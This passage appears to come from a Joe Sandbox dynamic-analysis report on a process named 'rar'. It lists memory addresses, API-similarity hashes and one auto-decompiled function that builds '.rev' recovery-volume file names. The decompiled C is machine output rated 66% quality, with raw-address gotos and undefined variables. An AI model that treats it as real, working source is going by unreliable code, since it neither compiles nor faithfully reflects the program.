                                                                                                            0x7ff650b4c19b
                                                                                                            0x7ff650b4c1b6
                                                                                                            0x7ff650b4c1bf
                                                                                                            0x7ff650b4c1c6
                                                                                                            0x7ff650b4c1d1
                                                                                                            0x7ff650b4c1df
                                                                                                            0x7ff650b4c1e4
                                                                                                            0x7ff650b4c1e6
                                                                                                            0x7ff650b4c1ed
                                                                                                            0x7ff650b4c1f9
                                                                                                            0x7ff650b4c1fe
                                                                                                            0x7ff650b4c212
                                                                                                            0x7ff650b4c22b
                                                                                                            0x7ff650b4c230
                                                                                                            0x7ff650b4c23a
                                                                                                            0x7ff650b4c23d
                                                                                                            0x7ff650b4c25a
                                                                                                            0x7ff650b4c25f
                                                                                                            0x7ff650b4c264
                                                                                                            0x7ff650b4c267
                                                                                                            0x7ff650b4c272
                                                                                                            0x7ff650b4c286
                                                                                                            0x7ff650b4c28b
                                                                                                            0x7ff650b4c292
                                                                                                            0x7ff650b4c299
                                                                                                            0x7ff650b4c2a2
                                                                                                            0x7ff650b4c2a6
                                                                                                            0x7ff650b4c2aa
                                                                                                            0x7ff650b4c2ad
                                                                                                            0x7ff650b4c2b1
                                                                                                            0x7ff650b4c2b4
                                                                                                            0x7ff650b4c2bf
                                                                                                            0x7ff650b4c2c6
                                                                                                            0x7ff650b4c2d3
                                                                                                            0x7ff650b4c2d8
                                                                                                            0x7ff650b4c2da
                                                                                                            0x7ff650b4c2e5
                                                                                                            0x7ff650b4c2f0
                                                                                                            0x7ff650b4c2f4
                                                                                                            0x7ff650b4c2ff
                                                                                                            0x7ff650b4c301
                                                                                                            0x7ff650b4c30a
                                                                                                            0x7ff650b4c310
                                                                                                            0x7ff650b4c318
                                                                                                            0x7ff650b4c31b
                                                                                                            0x7ff650b4c31d
                                                                                                            0x7ff650b4c324
                                                                                                            0x7ff650b4c32a
                                                                                                            0x7ff650b4c32d
                                                                                                            0x7ff650b4c330
                                                                                                            0x7ff650b4c337
                                                                                                            0x7ff650b4c33d
                                                                                                            0x7ff650b4c340
                                                                                                            0x7ff650b4c347
                                                                                                            0x7ff650b4c34c
                                                                                                            0x7ff650b4c35a
                                                                                                            0x7ff650b4c366
                                                                                                            0x7ff650b4c36c
                                                                                                            0x7ff650b4c377
                                                                                                            0x7ff650b4c37e
                                                                                                            0x7ff650b4c37e
                                                                                                            0x7ff650b4c389
                                                                                                            0x7ff650b4c395
                                                                                                            0x7ff650b4c39a
                                                                                                            0x7ff650b4c39d
                                                                                                            0x7ff650b4c3a1
                                                                                                            0x7ff650b4c3ab
                                                                                                            0x7ff650b4c3c3
                                                                                                            0x7ff650b4c3cd
                                                                                                            0x7ff650b4c3d7
                                                                                                            0x7ff650b4c3e4
                                                                                                            0x7ff650b4c3f8
                                                                                                            0x7ff650b4c3fa
                                                                                                            0x7ff650b4c3fe
                                                                                                            0x7ff650b4c402
                                                                                                            0x7ff650b4c407
                                                                                                            0x7ff650b4c40c
                                                                                                            0x7ff650b4c413
                                                                                                            0x7ff650b4c422
                                                                                                            0x7ff650b4c42b
                                                                                                            0x7ff650b4c436
                                                                                                            0x7ff650b4c443
                                                                                                            0x7ff650b4c44c
                                                                                                            0x7ff650b4c451
                                                                                                            0x7ff650b4c454
                                                                                                            0x7ff650b4c45f
                                                                                                            0x7ff650b4c466
                                                                                                            0x7ff650b4c46c
                                                                                                            0x7ff650b4c471
                                                                                                            0x7ff650b4c47d
                                                                                                            0x7ff650b4c482
                                                                                                            0x7ff650b4c488
                                                                                                            0x7ff650b4c48d
                                                                                                            0x7ff650b4c493
                                                                                                            0x7ff650b4c495
                                                                                                            0x7ff650b4c498
                                                                                                            0x7ff650b4c4aa
                                                                                                            0x7ff650b4c4b1
                                                                                                            0x7ff650b4c4b7
                                                                                                            0x7ff650b4c4be
                                                                                                            0x7ff650b4c4c0
                                                                                                            0x7ff650b4c4c3
                                                                                                            0x7ff650b4c4c8
                                                                                                            0x7ff650b4c4d1
                                                                                                            0x7ff650b4c4d8
                                                                                                            0x7ff650b4c4da
                                                                                                            0x7ff650b4c4dd
                                                                                                            0x7ff650b4c4e4
                                                                                                            0x7ff650b4c4e6
                                                                                                            0x7ff650b4c4ee
                                                                                                            0x7ff650b4c4f4
                                                                                                            0x7ff650b4c4fa
                                                                                                            0x7ff650b4c508
                                                                                                            0x7ff650b4c50e
                                                                                                            0x7ff650b4c514
                                                                                                            0x7ff650b4c518
                                                                                                            0x7ff650b4c51e
                                                                                                            0x7ff650b4c524
                                                                                                            0x7ff650b4c528
                                                                                                            0x7ff650b4c52a
                                                                                                            0x7ff650b4c52e
                                                                                                            0x7ff650b4c530
                                                                                                            0x7ff650b4c534
                                                                                                            0x7ff650b4c545
                                                                                                            0x7ff650b4c54f
                                                                                                            0x7ff650b4c554
                                                                                                            0x7ff650b4c55c
                                                                                                            0x7ff650b4c561
                                                                                                            0x7ff650b4c569
                                                                                                            0x7ff650b4c575
                                                                                                            0x7ff650b4c584
                                                                                                            0x7ff650b4c589
                                                                                                            0x7ff650b4c591
                                                                                                            0x7ff650b4c59a
                                                                                                            0x7ff650b4c59f
                                                                                                            0x7ff650b4c5a4
                                                                                                            0x7ff650b4c5b9
                                                                                                            0x7ff650b4c5c6
                                                                                                            0x7ff650b4c5cb
                                                                                                            0x7ff650b4c5d4
                                                                                                            0x7ff650b4c5d9
                                                                                                            0x7ff650b4c5e3
                                                                                                            0x7ff650b4c5eb
                                                                                                            0x7ff650b4c5ef
                                                                                                            0x7ff650b4c5fc
                                                                                                            0x7ff650b4c601
                                                                                                            0x7ff650b4c608
                                                                                                            0x7ff650b4c60b
                                                                                                            0x7ff650b4c60e
                                                                                                            0x7ff650b4c617
                                                                                                            0x7ff650b4c61d
                                                                                                            0x7ff650b4c625
                                                                                                            0x7ff650b4c62a
                                                                                                            0x7ff650b4c632
                                                                                                            0x7ff650b4c63c
                                                                                                            0x7ff650b4c644
                                                                                                            0x7ff650b4c646
                                                                                                            0x7ff650b4c650
                                                                                                            0x7ff650b4c657
                                                                                                            0x7ff650b4c667
                                                                                                            0x7ff650b4c671
                                                                                                            0x7ff650b4c676
                                                                                                            0x7ff650b4c67b
                                                                                                            0x7ff650b4c681
                                                                                                            0x7ff650b4c68a
                                                                                                            0x7ff650b4c68f
                                                                                                            0x7ff650b4c697
                                                                                                            0x7ff650b4c69f
                                                                                                            0x7ff650b4c6a1
                                                                                                            0x7ff650b4c6af
                                                                                                            0x7ff650b4c6ba
                                                                                                            0x7ff650b4c6bc
                                                                                                            0x7ff650b4c6c7
                                                                                                            0x7ff650b4c6d1
                                                                                                            0x7ff650b4c6d8
                                                                                                            0x7ff650b4c6e3
                                                                                                            0x7ff650b4c6f2
                                                                                                            0x7ff650b4c6f4
                                                                                                            0x7ff650b4c703
                                                                                                            0x7ff650b4c70b
                                                                                                            0x7ff650b4c717
                                                                                                            0x7ff650b4c71d
                                                                                                            0x7ff650b4c731
                                                                                                            0x7ff650b4c736
                                                                                                            0x7ff650b4c74a
                                                                                                            0x7ff650b4c75b
                                                                                                            0x7ff650b4c773
                                                                                                            0x7ff650b4c786
                                                                                                            0x7ff650b4c78e
                                                                                                            0x7ff650b4c79a
                                                                                                            0x7ff650b4c7a7
                                                                                                            0x7ff650b4c7a9
                                                                                                            0x7ff650b4c7b9
                                                                                                            0x7ff650b4c7c0
                                                                                                            0x7ff650b4c7c6
                                                                                                            0x7ff650b4c7cf
                                                                                                            0x7ff650b4c7d3
                                                                                                            0x7ff650b4c7d9
                                                                                                            0x7ff650b4c7db
                                                                                                            0x7ff650b4c7ef
                                                                                                            0x7ff650b4c800
                                                                                                            0x7ff650b4c811
                                                                                                            0x7ff650b4c816
                                                                                                            0x7ff650b4c81f
                                                                                                            0x7ff650b4c82f
                                                                                                            0x7ff650b4c834
                                                                                                            0x7ff650b4c837
                                                                                                            0x7ff650b4c840
                                                                                                            0x7ff650b4c846
                                                                                                            0x7ff650b4c851
                                                                                                            0x7ff650b4c858
                                                                                                            0x7ff650b4c85d
                                                                                                            0x7ff650b4c862
                                                                                                            0x7ff650b4c86f
                                                                                                            0x7ff650b4c879
                                                                                                            0x7ff650b4c88c
                                                                                                            0x7ff650b4c891
                                                                                                            0x7ff650b4c899
                                                                                                            0x7ff650b4c8a3
                                                                                                            0x7ff650b4c8ad
                                                                                                            0x7ff650b4c8b2
                                                                                                            0x7ff650b4c8bc
                                                                                                            0x7ff650b4c8c1
                                                                                                            0x7ff650b4c8c6
                                                                                                            0x7ff650b4c8ca
                                                                                                            0x7ff650b4c8cf
                                                                                                            0x7ff650b4c8d2
                                                                                                            0x7ff650b4c8de
                                                                                                            0x7ff650b4c8e0
                                                                                                            0x7ff650b4c8f1
                                                                                                            0x7ff650b4c8f8
                                                                                                            0x7ff650b4c8fa
                                                                                                            0x7ff650b4c8fc
                                                                                                            0x7ff650b4c905
                                                                                                            0x7ff650b4c90b
                                                                                                            0x7ff650b4c90d
                                                                                                            0x7ff650b4c912
                                                                                                            0x7ff650b4c917
                                                                                                            0x7ff650b4c91b
                                                                                                            0x7ff650b4c927
                                                                                                            0x7ff650b4c936
                                                                                                            0x7ff650b4c939
                                                                                                            0x7ff650b4c93e
                                                                                                            0x7ff650b4c944
                                                                                                            0x7ff650b4c952
                                                                                                            0x7ff650b4c959
                                                                                                            0x7ff650b4c95e
                                                                                                            0x7ff650b4c963
                                                                                                            0x7ff650b4c965
                                                                                                            0x7ff650b4c970
                                                                                                            0x7ff650b4c980
                                                                                                            0x7ff650b4c982
                                                                                                            0x7ff650b4c989
                                                                                                            0x7ff650b4c98c
                                                                                                            0x7ff650b4c992
                                                                                                            0x7ff650b4c9a4
                                                                                                            0x7ff650b4c9b1
                                                                                                            0x7ff650b4c9b7
                                                                                                            0x7ff650b4c9e1
                                                                                                            0x7ff650b4c9fb
                                                                                                            0x7ff650b4ca03
                                                                                                            0x7ff650b4ca05
                                                                                                            0x7ff650b4ca08
                                                                                                            0x7ff650b4ca0d
                                                                                                            0x7ff650b4ca19
                                                                                                            0x7ff650b4ca21
                                                                                                            0x7ff650b4ca27
                                                                                                            0x7ff650b4ca2f
                                                                                                            0x7ff650b4ca3c
                                                                                                            0x7ff650b4ca3e
                                                                                                            0x7ff650b4ca49
                                                                                                            0x7ff650b4ca4f
                                                                                                            0x7ff650b4ca51
                                                                                                            0x7ff650b4ca5e
                                                                                                            0x7ff650b4ca63
                                                                                                            0x7ff650b4ca67
                                                                                                            0x7ff650b4ca6a
                                                                                                            0x7ff650b4ca72
                                                                                                            0x7ff650b4ca77
                                                                                                            0x7ff650b4ca7e
                                                                                                            0x7ff650b4ca83
                                                                                                            0x7ff650b4ca8d
                                                                                                            0x7ff650b4ca90
                                                                                                            0x7ff650b4ca95
                                                                                                            0x7ff650b4ca9b
                                                                                                            0x7ff650b4ca9f
                                                                                                            0x7ff650b4caac
                                                                                                            0x7ff650b4caaf
                                                                                                            0x7ff650b4cabb
                                                                                                            0x7ff650b4cac7
                                                                                                            0x7ff650b4cace
                                                                                                            0x7ff650b4cad5
                                                                                                            0x7ff650b4cad8
                                                                                                            0x7ff650b4cae3
                                                                                                            0x7ff650b4cae9
                                                                                                            0x7ff650b4caf7
                                                                                                            0x7ff650b4cb02
                                                                                                            0x7ff650b4cb0c
                                                                                                            0x7ff650b4cb1f
                                                                                                            0x7ff650b4cb24
                                                                                                            0x7ff650b4cb39
                                                                                                            0x7ff650b4cb3e
                                                                                                            0x7ff650b4cb43
                                                                                                            0x7ff650b4cb48
                                                                                                            0x7ff650b4cb4e
                                                                                                            0x7ff650b4cb53
                                                                                                            0x7ff650b4cb6c
                                                                                                            0x7ff650b4cb73
                                                                                                            0x7ff650b4cb80
                                                                                                            0x7ff650b4cb85
                                                                                                            0x7ff650b4cb92
                                                                                                            0x7ff650b4cba8
                                                                                                            0x7ff650b4cbbc
                                                                                                            0x7ff650b4cbbe
                                                                                                            0x7ff650b4cbc8
                                                                                                            0x7ff650b4cbd0
                                                                                                            0x7ff650b4cbd6
                                                                                                            0x7ff650b4cbdd
                                                                                                            0x7ff650b4cbe0
                                                                                                            0x7ff650b4cbe5
                                                                                                            0x7ff650b4cbea
                                                                                                            0x7ff650b4cbf1
                                                                                                            0x7ff650b4cbf6
                                                                                                            0x7ff650b4cbf8
                                                                                                            0x7ff650b4cbfa
                                                                                                            0x7ff650b4cc06
                                                                                                            0x7ff650b4cc17
                                                                                                            0x7ff650b4cc1d
                                                                                                            0x7ff650b4cc23
                                                                                                            0x7ff650b4cc2e
                                                                                                            0x7ff650b4cc37
                                                                                                            0x7ff650b4cc3f
                                                                                                            0x7ff650b4cc43
                                                                                                            0x7ff650b4cc49
                                                                                                            0x7ff650b4cc4d
                                                                                                            0x7ff650b4cc58
                                                                                                            0x7ff650b4cc61
                                                                                                            0x7ff650b4cc73
                                                                                                            0x7ff650b4cc79
                                                                                                            0x7ff650b4cc8d
                                                                                                            0x7ff650b4cc94
                                                                                                            0x7ff650b4cca3
                                                                                                            0x7ff650b4ccaa
                                                                                                            0x7ff650b4ccbc
                                                                                                            0x7ff650b4ccc4
                                                                                                            0x7ff650b4ccc6
                                                                                                            0x7ff650b4ccd7
                                                                                                            0x7ff650b4ccdc
                                                                                                            0x7ff650b4ccf0
                                                                                                            0x7ff650b4ccfc
                                                                                                            0x7ff650b4ccfe
                                                                                                            0x7ff650b4cd08
                                                                                                            0x7ff650b4cd12
                                                                                                            0x7ff650b4cd16
                                                                                                            0x7ff650b4cd18
                                                                                                            0x7ff650b4cd29
                                                                                                            0x7ff650b4cd35
                                                                                                            0x7ff650b4cd42
                                                                                                            0x7ff650b4cd52
                                                                                                            0x7ff650b4cd5b
                                                                                                            0x7ff650b4cd69
                                                                                                            0x7ff650b4cd71
                                                                                                            0x7ff650b4cd78
                                                                                                            0x7ff650b4cd80
                                                                                                            0x7ff650b4cd8e
                                                                                                            0x7ff650b4cd9b
                                                                                                            0x7ff650b4cdcb

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: String$Load$Comparefflush
                                                                                                            • String ID: $*.*$*.rev$.bad$.rev
                                                                                                            • API String ID: 955367980-432961171
                                                                                                            • Opcode ID: f0c24f2890032a60f36873af816602b570b5054c58fc18528af2d6f5d8ec8255
                                                                                                            • Instruction ID: 30e46521d21a5ebc17c934256a08438291b42ac59d9e1a8e9d61d91c92d3f993
                                                                                                            • Opcode Fuzzy Hash: f0c24f2890032a60f36873af816602b570b5054c58fc18528af2d6f5d8ec8255
                                                                                                            • Instruction Fuzzy Hash: 5282B522A1868775EB60DF25D4C11FD67A2FF46B84F480035DA8EA7B99DE3AE705C700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B33E74 Relevance: 6.1, APIs: 4, Instructions: 67fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                            • String ID:
                                                                                                            • API String ID: 998109204-0
                                                                                                            • Opcode ID: d10878d4ba9640c534b41a9a9d2bb83c1ba45795d6eb0c4709fb304717fac03a
                                                                                                            • Instruction ID: 5a3fc9d6139d01560a4ac4622e4bf5300124aa66aed7ba24bb4c1b2ad40c60cc
                                                                                                            • Opcode Fuzzy Hash: d10878d4ba9640c534b41a9a9d2bb83c1ba45795d6eb0c4709fb304717fac03a
                                                                                                            • Instruction Fuzzy Hash: BC21B422A1868652E7608F11F4847AB6360FB997F4F140335EA9A57BE8CF7DC5448B00
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B4AF80 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 407COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 66%
                                                                                                            			E00007FF67FF650B4AF80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __ebp, void* __esp, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx, void* __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t151;
				intOrPtr _t152;
				signed int _t176;
				void* _t178;
				void* _t183;
				void* _t190;
				void* _t206;
				void* _t213;
				signed int _t243;
				signed int _t247;
				signed int _t251;
				void* _t263;
				signed long long _t306;
				signed long long _t307;
				signed long long _t309;
				signed long long _t311;
				signed long long _t313;
				signed int _t316;
				intOrPtr* _t326;
				signed long long _t337;
				signed int _t354;
				void* _t393;
				signed long long _t394;
				signed long long _t395;
				intOrPtr* _t399;
				intOrPtr* _t401;
				intOrPtr _t402;
				void* _t404;
				signed long long _t405;
				signed short* _t406;
				signed long long _t407;
				void* _t412;
				void* _t413;
				void* _t415;
				signed long long _t416;
				void* _t430;
				void* _t431;
				void* _t432;
				void* _t441;
				long long _t442;
				void* _t446;
				void* _t447;
				signed short* _t449;
				long long _t451;
				long long _t453;

				_t263 = __ebp;
				_t206 = __ebx;
				 *((long long*)(_t415 + 0x20)) = __rbx;
				_t413 = _t415 - 0x4020;
				E00007FF67FF650B69CB0(0x4120, __rax, _t430, _t431);
				_t416 = _t415 - __rax;
				_t306 =  *0x50b978f0; // 0x27db226282f1
				_t307 = _t306 ^ _t416;
				 *(_t413 + 0x4010) = _t307;
				_t447 = __r8;
				 *((long long*)(_t416 + 0x50)) = __rdx;
				_t326 = __rcx;
				r8d = 0x800;
				E00007FF67FF650B5A390(_t413 + 0x3010, __r8, __r8);
				r15d = 0;
				r13d = r15d;
				 *((long long*)(_t416 + 0x58)) = _t451;
				if (E00007FF67FF650B3345C() == 0) goto 0x50b4b0a9;
				r12d = 0;
				if ( *((long long*)(__rcx + 8)) - 0xffff >= 0) goto 0x50b4b09c;
				E00007FF67FF650B69B58(_t307, __r8);
				 *(_t416 + 0x60) = _t307;
				if (_t307 == 0) goto 0x50b4b026;
				E00007FF67FF650B31C28(_t307);
				goto 0x50b4b029;
				_t453 = __rdx;
				 *((long long*)(_t413 + 0xfd0)) = __rdx;
				E00007FF67FF650B32864();
				 *(_t413 + 0x1fd8) =  *(_t413 + 0x1fd8) | 0xffffffff;
				 *((long long*)(_t413 + 0x1fe0)) = __rdx;
				_t394 = _t413 + 0x1ff0;
				_t405 = _t413 + 0xfd0;
				memcpy(__edi, __esi, 0x1020);
				E00007FF67FF650B4B7CC(_t326, _t326, _t413 + 0x1ff0);
				E00007FF67FF650B320B8(_t326, _t453, _t405, _t451);
				_t442 =  >  ? _t307 : _t441;
				r8d = 0;
				E00007FF67FF650B44E90(0, 0x800, _t307, _t326, _t447, _t405, _t413);
				if (E00007FF67FF650B3345C() != 0) goto 0x50b4aff7;
				 *((long long*)(_t416 + 0x58)) = _t442;
				r15d = 0;
				_t243 =  *(_t326 + 8);
				 *(_t326 + 0x50) = _t243;
				if (_t243 - 0xffff < 0) goto 0x50b4b0cf;
				r8d = 0xffff;
				E00007FF67FF650B23C90(0x31, _t447);
				goto 0x50b4b58d;
				if (_t243 - 2 < 0) goto 0x50b4b58d;
				_t251 =  *( *((intOrPtr*)(_t416 + 0x50)) + 0x7150);
				if (_t251 >= 0) goto 0x50b4b102;
				_t213 = (r15d & 0xffffff00 |  ~(_t251 * _t243) != (0x51eb851f *  ~(_t251 * _t243) >> 0x00000020 >> 0x00000005) * 0x00000064) + (0x51eb851f *  ~(_t251 * _t243) >> 0x20 >> 5);
				goto 0x50b4b105;
				_t337 = _t405;
				 *(_t326 + 0x54) = _t213;
				_t151 = _t394 + _t394 * 4 + _t394 + _t394 * 4;
				if (_t213 - _t151 <= 0) goto 0x50b4b116;
				 *(_t326 + 0x54) = _t151;
				_t152 = _t394 + _t337;
				 *((intOrPtr*)(_t326 + 0x58)) = _t152;
				if (_t152 - 0xffff <= 0) goto 0x50b4b141;
				r8d = 0xffff;
				E00007FF67FF650B23C90(0x31, _t447);
				 *(_t326 + 0x54) = 0xffff -  *(_t326 + 0x50);
				if ((0x04000000 / _t337 & 0x00000001) == 0) goto 0x50b4b152;
				_t309 = _t307 - 0x00000001 & 0xfffffff0;
				 *(_t326 + 0x48) = _t309;
				r15d = 0;
				E00007FF67FF650B44330(_t309, _t413 + 0x3010);
				if (_t309 == 0) goto 0x50b4b1b6;
				E00007FF67FF650B44590(_t326, _t394, _t405, _t413, _t446, _t441);
				_t395 = _t309;
				_t44 = _t405 + 1; // 0x1
				r15d = _t44;
				if (_t395 - _t413 + 0x3010 <= 0) goto 0x50b4b1b3;
				_t46 = _t395 - 2; // -2
				_t406 = _t46;
				if (E00007FF67FF650B59F44(_t413 + 0x3010) == 0) goto 0x50b4b1b1;
				_t396 = _t406;
				r15d = r15d + 1;
				_t311 = _t413 + 0x3010;
				if (_t406 - _t311 > 0) goto 0x50b4b18f;
				 *_t406 = 0;
				 *(_t416 + 0x48) = 0;
				if ( *(_t326 + 0x54) <= 0) goto 0x50b4b313;
				 *(_t416 + 0x44) = 1;
				 *((intOrPtr*)(_t416 + 0x28)) = 1;
				 *(_t416 + 0x20) = r15d;
				E00007FF67FF650B1657C( *_t406 & 0x0000ffff, _t311, _t413 + 0xfd0, _t447, L"%ls%0*u.rev", _t413 + 0x3010, _t432);
				E00007FF67FF650B69B58(_t311, _t413 + 0xfd0);
				 *(_t416 + 0x60) = _t311;
				if (_t311 == 0) goto 0x50b4b216;
				E00007FF67FF650B31C28(_t311);
				goto 0x50b4b219;
				_t449 = _t406;
				 *(_t413 + 0x1ff0) = _t449;
				 *(_t413 + 0x2ff8) =  *(_t413 + 0x2ff8) | 0xffffffff;
				 *((intOrPtr*)(_t416 + 0x38)) = sil;
				 *(_t416 + 0x30) = _t406;
				 *((long long*)(_t416 + 0x28)) = 0x7fffffff;
				_t313 = _t416 + 0x40;
				 *(_t416 + 0x20) = _t313;
				if (E00007FF67FF650B317E8(_t326,  *((intOrPtr*)(_t416 + 0x50)), _t449, _t396, _t406, _t413, _t413 + 0xfd0, _t396) != 0) goto 0x50b4b29b;
				if ( *((intOrPtr*)(_t416 + 0x40)) != 0) goto 0x50b4b282;
				E00007FF67FF650B2C924( *((intOrPtr*)(_t416 + 0x40)), _t326, 0x50ba7ab8, _t413 + 0xfd0, _t396);
				asm("sbb edx, edx");
				E00007FF67FF650B2C930(9,  *((intOrPtr*)(_t416 + 0x40)), _t326, 0x50ba7ab8, _t413 + 0xfd0, _t413 + 0xfd0, _t396);
				_t407 = _t413 + 0x1ff0;
				memcpy(0x800, 0, 0x1020);
				E00007FF67FF650B4B7CC(_t326, _t326, _t413 - 0x50);
				E00007FF67FF650B32388(_t449);
				r8d =  *(_t416 + 0x48);
				r8d = r8d +  *(_t326 + 0x50);
				r9d = 0;
				E00007FF67FF650B4DC8C(0, 9, _t263,  *((intOrPtr*)(_t416 + 0x40)), _t313, _t326, _t326, _t449, _t413 - 0x50, _t407, _t413 + 0xfd0, _t396, _t393);
				E00007FF67FF650B111C0(0x76, _t413 + 0xfd0);
				E00007FF67FF650B111C0(0x97, _t413 + 0xfd0);
				_t176 =  *(_t416 + 0x44);
				 *(_t416 + 0x48) = _t176;
				if (_t176 -  *(_t326 + 0x54) < 0) goto 0x50b4b1c5;
				 *(_t416 + 0x44) =  *(_t416 + 0x44) | 0xffffffff;
				E00007FF67FF650B283F0(L"     ", _t413 + 0xfd0, _t413 + 0xfd0, _t396, _t404);
				_t178 = E00007FF67FF650B55F88(_t313, _t416 + 0x70);
				r9d = 0;
				r8d =  *(_t326 + 0x54);
				E00007FF67FF650B55FF8(_t178,  *(_t326 + 0x50), _t313, _t326, _t416 + 0x70, _t413 + 0xfd0, _t413 + 0xfd0, _t396);
				E00007FF67FF650B69B9C(_t413 + 0xfd0, _t396);
				 *(_t326 + 0x28) = _t313;
				r12d = r12d & 0x0000000f;
				_t437 =  ~_t313 + _t313;
				 *(_t416 + 0x60) =  ~_t313 + _t313;
				r14d = 0;
				if ( *(_t326 + 0x50) <= 0) goto 0x50b4b4f0;
				E00007FF67FF650B5B008();
				_t399 = _t313 * 0x1020 +  *_t326;
				_t183 =  *0x50b80550();
				 *(_t416 + 0x48) = 0;
				 *((intOrPtr*)(_t399 + 0x1008)) = E00007FF67FF650B28538(_t206,  *((intOrPtr*)(_t399 + 0x1008)),  *((intOrPtr*)( *((intOrPtr*)( *_t399)) + 0x18)), _t326,  *_t399,  ~_t313 + _t313, _t399, _t407, _t183);
				_t354 =  *(_t416 + 0x48);
				_t316 = _t354;
				 *((intOrPtr*)(_t399 + 0x1010)) =  *((intOrPtr*)(_t399 + 0x1010)) + _t316;
				if (_t354 ==  *(_t326 + 0x48)) goto 0x50b4b3e9;
				E00007FF67FF650B6C1A0(_t184, 0, _t354 +  ~_t313 + _t313,  *(_t326 + 0x48) - _t316,  *(_t326 + 0x48) - _t316);
				r14d =  >  ?  *(_t416 + 0x48) : r14d;
				if ( *(_t326 + 0x48) - _t442 - _t407 >= 0) goto 0x50b4b3fe;
				goto 0x50b4b405;
				 *((char*)(_t416 + 0x28)) = 1;
				 *(_t416 + 0x20) =  *((intOrPtr*)(_t416 + 0x58)) - r15d;
				r8d = 0;
				0x50b4b648();
				if (1 -  *(_t326 + 0x50) < 0) goto 0x50b4b37a;
				if (r14d == 0) goto 0x50b4b4f2;
				r13d = 0;
				if ( *(_t326 + 0x54) <= 0) goto 0x50b4b4a9;
				_t190 =  ==  ? r14d :  &(_t449[0]);
				E00007FF67FF650B5B008();
				_t401 = (_t316 + _t326) * 0x1020 +  *_t326;
				E00007FF67FF650B329C4(_t206, 0, _t263, _t316 + _t326, _t326,  *_t401, _t407 *  *(_t326 + 0x48) +  *((intOrPtr*)(_t326 + 0x40)), _t316);
				 *((intOrPtr*)(_t401 + 0x1008)) = E00007FF67FF650B28538(_t206,  *((intOrPtr*)(_t401 + 0x1008)), _t316 + _t326, _t326,  *_t401, _t407 *  *(_t326 + 0x48) +  *((intOrPtr*)(_t326 + 0x40)), _t401, _t407 *  *(_t326 + 0x48) +  *((intOrPtr*)(_t326 + 0x40)), _t316);
				r13d = r13d + 1;
				if (r13d -  *(_t326 + 0x54) < 0) goto 0x50b4b450;
				_t444 =  *((intOrPtr*)(_t416 + 0x58));
				_t247 = E00007FF67FF650B59AD8(_t407,  *((intOrPtr*)(_t416 + 0x58)));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t416 + 0x50)) + 0x7154)) != sil) goto 0x50b4b4e5;
				if (_t247 ==  *(_t416 + 0x44)) goto 0x50b4b4e5;
				E00007FF67FF650B5CE78(_t247, _t247 -  *(_t416 + 0x44),  *((intOrPtr*)(_t416 + 0x50)), _t326, _t407, _t401, _t407 *  *(_t326 + 0x48) +  *((intOrPtr*)(_t326 + 0x40)),  *((intOrPtr*)(_t416 + 0x58)), _t437);
				 *(_t416 + 0x44) = _t247;
				goto 0x50b4b369;
